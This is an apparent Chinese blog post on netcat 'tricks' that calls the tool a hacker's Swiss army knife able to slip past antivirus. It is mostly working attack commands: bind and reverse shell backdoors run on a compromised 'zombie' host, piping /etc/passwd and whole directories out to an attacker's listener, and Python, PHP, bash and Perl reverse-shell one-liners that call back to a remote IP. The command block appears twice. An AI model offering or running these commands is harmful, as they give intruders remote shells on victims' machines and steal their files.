NetCat 工具的常用使用技巧
工具 使用 技巧 常用 netcat
2023-06-13 09:16:21 时间
netcat 黑客们的瑞士军刀,虽然小巧但是其功能一点也不弱,并且该工具天生免杀,值得你去尝试。
NCwindows反弹
1:正向连接
服务器执行:nc -l -p 8888 -e cmd.exe
本地主机执行:nc -vv 服务器ip 8888
2:反向连接
服务器执行:nc -e cmd.exe 公网ip 8888
公网主机执行:nc -lvp 8888
帮助信息
[root@localhost ~]# nc -help
-g <网关> 设置路由器跃程通信网关,最多可设置8个;
-G <指向器数目> 设置来源路由指向器,其数值为4的倍数;
-h 在线帮助;
-i <延迟秒数> 设置时间间隔,以便传送信息及扫描通信端口;
-l 使用监听模式,管控传入的资料;
-n 直接使用IP地址,而不通过域名服务器;
-o <输出文件> 指定文件名称,把往来传输的数据以16进制字码倾倒成该文件保存;
-p <通信端口> 设置本地主机使用的通信端口;
-r 乱数指定本地与远端主机的通信端口;
-s <来源位址> 设置本地主机送出数据包的IP地址;
-u 使用UDP传输协议;
-v 显示指令执行过程;
-w <超时秒数> 设置等待连线的时间;
-z 使用0输入/输出模式,只在扫描通信端口时使用。
远程端口探测 连接远程主机的80端口,并获取到该端口的版本信息
lyshark@dell:~$ nc -nv 192.168.1.20 80
实现快速端口扫描 扫描目标主机开放的端口,例如从 70-100 那个端口是开放的
lyshark@dell:~$ nc -nvv -w2 -z 192.168.1.20 70-100 TCP扫描
lyshark@dell:~$ nc -nvv -w2 -z -u 192.168.1.20 70-100 UDP扫描
正向连接后门 正向连接后门,创建正向连接后门,无法过墙
[root@localhost ~]# nc -l -p 9999 -e /bin/sh 肉鸡执行
lyshark@dell:~$ nc -nv 192.168.1.20 9999 服务端执行
反向连接后门 反向连接后门,推荐使用。
[root@localhost ~]# nc -t -e /bin/sh 192.168.1.2 9999
服务端执行 nc -l -p 9999
远程传输文件 远程传输问渐渐,同理,这里不截图了。
[root@localhost ~]# nc 192.168.1.2 9999 < /etc/passwd
lyshark@dell:~/w$ nc -l 9999 > passwd.log
远程传输目录
lyshark@dell:~/w$ nc -l 9999 | tar xzvf -
[root@localhost etc]# tar -czf - * | nc 192.168.1.2 9999
Python 反弹端口
[root@localhost ~]# python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.2",9999));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
lyshark@dell:~$ nc -lvp 9999
其他反弹端口
php -r '$sock=fsockopen("192.168.1.2",9999);exec("/bin/sh -i <&3 >&3 2>&3");' php 反弹
bash -i>&/dev/tcp/192.168.1。2/9999 0>&1 bash 反弹
perl -e 'use Socket;$i="192.168.1。2";$p=9999;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' perl反弹
# 连接远程主机的80端口,并获取到该端口的版本信息
lyshark@dell:~$ nc -nv 192.168.1.20 80
# 扫描目标主机开放的端口,从70-100 那个端口是开放的
lyshark@dell:~$ nc -nvv -w2 -z 192.168.1.20 70-100 TCP扫描
lyshark@dell:~$ nc -nvv -w2 -z -u 192.168.1.20 70-100 UDP扫描
# 正向连接后门,创建正向连接后门,无法过墙
[root@localhost ~]# nc -l -p 9999 -e /bin/sh 肉鸡执行
lyshark@dell:~$ nc -nv 192.168.1.20 9999 服务端执行
# 反向连接后门
[root@localhost ~]# nc -t -e /bin/sh 192.168.1.2 9999
lyshark@dell:~$ nc -l -p 9999
#远程传输文件
[root@localhost ~]# nc 192.168.1.2 9999 < /etc/passwd
lyshark@dell:~/w$ nc -l 9999 > passwd.log
# 远程传输目录
lyshark@dell:~/w$ nc -l 9999 | tar xzvf -
[root@localhost etc]# tar -czf - * | nc 192.168.1.2 9999
# Python 反弹nc端口
[root@localhost ~]# python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.2",9999));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
lyshark@dell:~$ nc -lvp 9999
# 其他反弹端口
php -r '$sock=fsockopen("192.168.1.2",9999);exec("/bin/sh -i <&3 >&3 2>&3");' php 反弹
bash -i>&/dev/tcp/192.168.1。2/9999 0>&1 bash 反弹
perl -e 'use Socket;$i="192.168.1。2";$p=9999;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' perl反弹
相关文章
- 【程序源代码】抖音视频去水印工具
- 小程序-微信开发者工具使用教程_小程序开发教程
- 数据分析er看过来,五款工具有你需要的
- 基于Appium实现UI遍历工具(七)总结
- Git分布式版本控制工具学习(七)
- 微软开源的命令行神器成Win 11默认工具,网友/是时候彻底弃用 cmd了
- Steam 平台玩家必备工具!
- 第37篇:fortify代码审计工具的使用技巧(1)-审计java代码过程
- 上传20M的ipa ,使用Appuploader工具只有2分钟左右即可上传成功
- 【Android 内存优化】使用 Memory Analyzer ( MAT ) 工具分析内存 ( MAT 工具使用 | 最大对象 | 类实例个数 | 引用与被引用 | GC Roots 最短链 )
- 【Android 逆向】使用 Python 编写 APK 批处理分析工具
- 【Android 逆向】ApkTool 工具使用 ( ApkTool 简介 | ApkTool 解包和打包 )
- Spring Boot的依赖管理和构建工具
- 使用Linux监视系统:掌握实时状态(linux监视工具)
- 3 个 Python 命令行工具
- K-3D是基于GNU/Linux和Win32的一个三维建模、动画和绘制系统,是一款免费、开放原始码的 3D 模型和动画制作与渲染 (rendering) 工具,它强大的功能可以满足专业人士的需求。它可以创建和编辑 3D 几何图形,提供极具弹性的面向对象的插件增强功能及以节点作基础的可视化管线架构,所有参数和选项的调整,都会立即显现结果,而且可以无限次数地复原与取消复原。此外,它使用与 RenderMan 相符的渲染引擎 (render engine),可创作出电影质量的 3D 动画。
- 应用Redis:高效率工具类应用(redis工具类)
- Linux传输文件工具SCP:使用选择技巧(linuxscp选择)
- 构建数据仓库:使用Oracle ETL工具(oracle的etl工具)
- MySQL 弱口令 危险,请尽快利用工具修复!(mysql弱口令利用工具)
- 使用MSSQL连接工具快速上手(mssql连接工具 中文)
- 使用多模块Redis工具优化存储效率(多模块redis工具)
- mysqlsla慢查询分析工具使用笔记
- PHP小技巧之JS和CSS优化工具Minify的使用方法